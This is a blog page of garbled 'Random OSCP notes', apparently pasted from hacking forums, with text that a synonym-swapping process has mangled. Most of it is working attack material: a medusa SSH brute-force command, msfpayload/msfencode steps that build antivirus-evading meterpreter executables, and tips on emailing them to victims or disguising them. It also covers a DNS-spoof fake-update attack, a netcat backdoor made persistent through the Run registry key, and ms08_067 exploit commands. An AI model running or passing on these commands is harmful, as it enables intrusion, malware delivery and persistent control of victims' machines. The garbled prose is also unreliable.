-->

Random Oscp Notes

Random Oscp Notes

medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output

##Add personal banner to metasploit###

Hi
I know yous gonna dearest this ane :)
was playing alongside metasploit until i opened a folder called " UI"
Then i had an persuasion that i am going to portion alongside yous :)

How to brand your ain banner together with add together it to Metasploit ? !!
go into this directory
/opt/metasploit/apps/pro/msf3/lib/msf/ui/logos
and banking concern agree out the content of every file aspect test.rb

u tin role this website to larn overnice banner templates

http://patorjk.com/software/taag/

When yous made your ain banner yous demand to give it a mention together with relieve it every bit " txt ".
Place it inwards /logos directory.
Now Open the file :  banner.rb together with add together your personal txt file " every bit shown inwards the photograph ".
save together with exit.

That's it , savour metasploit  ;)
#########################
##########How to bypass RDP authentication#############

RDP = Remote Desktop Protocol.

In this tutorial i volition demo yous how to bypass the authentication window when trying to connect to a windows box on port : 3389 " Default RDP port ".
Unfortunately nosotros volition demand to role Windows Box for it to work.

This is how an RDP customer looks on windows:
Let's tell yous demand to connect to a remote windows Desktop , subsequently entering the IP , clic Connect .
This window volition appear :
You volition live on asked to larn into a password of the remote machine . Do non worry virtually it if yous dont get got it .
Go dorsum to the remote connexion window together with clic on : Show Options .
this window volition appear :
Clic on : Save every bit together with relieve it on your desktop , it volition aspect similar this :
Right click it> Open with> Notepad

Change "authentication level:i:2" to "authentication level:i:0". What this does is take's all the safety measures away from connecting. Like this :

Scroll downward to the bottom of the notepad together with add together "enablecredsspsupport:i:0". Now press "Ctrl + S" to relieve that. similar this :

Now opened upwardly the remote desktop connexion file nosotros get got only made.

You should larn the regular remote desktop connexion window. Enter a IP address together with click "Connect".

You should larn a covert that look's similar this. Click "Connect" together with it should connect you. If it brings upwardly the credentials screen, larn into your password together with click "OK",

it volition locomote now.

You volition larn this message, click "Yes".

And Voilla' :
Enjoy the tutorial together with DO NOT TRY information technology ON H5N1 BOX THAT IS NOT YOUR'S OR YOU HAVE NO PERMISSION TO CONNECT TO IT.
TCP connections are traceable .

###################
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15  LPORT=4444 x  > /root/Desktop/n1tr0g3n.exe
LHOST = your Backtrack IP address or attacking estimator IP Address which volition live on waiting for the connexion wirth meterpreter.

LPORT = Default port Metasploit uses " Just role it  ;)"

/root/Desktop/n1tr0g3n.exe =  Path together with mention yous desire for the .exe  "make certain to mention it alongside the .exe extension therefore windows knows how to run it.

Output should looks something similar this when it's done

Here's the command to encrypt the file eight times using x86/shikata_ga_nai for those of yous who powerfulness inquire anyways together with desire to endeavour together with larn inwards undetectable to AV's.  ;)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c eight -t exe -x/root/n1tr0g3n.exe -o /root/n1tr0g3n.exe

Just modify the .exe mention , LPORT together with LHOST to the ones yous neeed together with you'll live on good..

Now ship this file to a user through electronic mail or jump crusade if your on the same network together with tell them to opened upwardly it upwardly together with it volition execute together with showtime the listener  automatically.
Now were going to fix a listener alongside meterpreter waiting for connexion from the victim.

open upwardly concluding together with type
msfconsole
once metasploit loads upwardly type

use exploit/multi/handler                 ----->  Exploit yous volition live on using

set LHOST 192.168.1.15       ------>  your Backtrack machine or aggressor machines IP Address ane time again

set LPORT 4444                 ----> same default port metasploit uses together with yous chose piece creating the .exe

set PAYLOAD windows/meterpreter/reverse_tcp             ------>  Payload used for contrary connexion dorsum to you.

exploit                      --------> to officially showtime the listener

Now larn over to your windows box "victim" together with double click the executable together with sentry every bit meterpreter opens a session, yous should immediately get got an opened upwardly session on the exploited

box together with get got total control.

There's a lot yous tin exercise alongside this but yous may desire to bind the file to a mp3 or jpeg therefore when the victim opens it they larn a generic error together with don't actually know what

happened inwards the background....We know what happened together with would live on suspicious but most people barely know how to surf the spider web therefore attacks similar this tin laissez passer on really easily

 :D


might i advise using msfencode together with using the shikata ga nai permutation a span times to larn it transcend av together with fw???

=) i know yous already know this though!!!

To trim down detection its best to role diverse encoding options.

Bit similar this ;
Code: [Select]

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | \
./msfencode -e x86/shikata_ga_nai -c five -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c five -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o payload.exe


Also, if yous desire to role the exploit, best to exam alongside AV on your local machine to avoid sites similar VirusTotal passing it on to AV vendors.

could i advise a dissimilar file type???

.VBS is non scanned past times AV together with industrial plant i would tell 98% of the fourth dimension =)


#################

Greetings
** This tutorial is an explanation ( Not detailed ) Therefore it is non for beginners , yous demand to live on familiar alongside several steps:
-Proxy & socks
-Ettercap together with Dns spoof
-Metasploit
-SET
-Netcat
-registry editing

Let's Begin

1 Start estimator connect together with larn proxy.

2 DISCONNECT FROM INTERNET SAVE PROXY INFO BUT DONT RUN

3 modify hostname & hosts file, therefore restart computer

4 therefore sign inwards (not connected to network) together with modify mac

5 opened upwardly up firefox (still non connected) together with larn into proxy info

(optional: larn into router together with plow logging together with firewall off)

6 connect to internet.

7 run nmap together with etherape (optional: wireshark)

8 cp /pentest/windows-binaries/tools/nc.exe /root/Desktop

9 Run SET role coffee assail to showtime meterpreter session

10 DNS spoof the network


Now hold off for the victim to download the mistaken update together with yous volition larn a meterpreter shell.

sessions -i (sessions # ie: 1)

**when meterpreter session connected**

(youll demand to get got netcat copied to desktop)

11 upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v System -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"


check it by:

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run


-then-

spoof anything, add together users, create folders/documents, accept screenshots, kill processes, ect ect ect.

then type:

reboot

then to connect

nc (ip address) 1111

Enjoy  ;) exercise non live on distructive.

#################

medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output

##Add personal banner to metasploit###

Hi
I know yous gonna dearest this ane :)
was playing alongside metasploit until i opened a folder called " UI"
Then i had an persuasion that i am going to portion alongside yous :)

How to brand your ain banner together with add together it to Metasploit ? !!
go into this directory
/opt/metasploit/apps/pro/msf3/lib/msf/ui/logos
and banking concern agree out the content of every file aspect test.rb

u tin role this website to larn overnice banner templates

http://patorjk.com/software/taag/

When yous made your ain banner yous demand to give it a mention together with relieve it every bit " txt ".
Place it inwards /logos directory.
Now Open the file :  banner.rb together with add together your personal txt file " every bit shown inwards the photograph ".
save together with exit.

That's it , savour metasploit  ;)
#########################

set LHOST [IP ADRESS INT.] = laid LHOST 192.168.1.15

# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

# So when yous input anything where at that topographic point is [], recollect to take the []

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_bind_tcp
set target 12
set lport 123
set rhost 192.168.177.131
exploit -i

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_reverse_tcp
set target 12
set lport 123
set lhost 192.168.177.128
set rhost 192.168.177.131
exploit -i

use exploit/multi/handler
lhost => 192.168.2.7
set lport 443
set payload windows/meterpreter/reverse_tcp

############################


Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser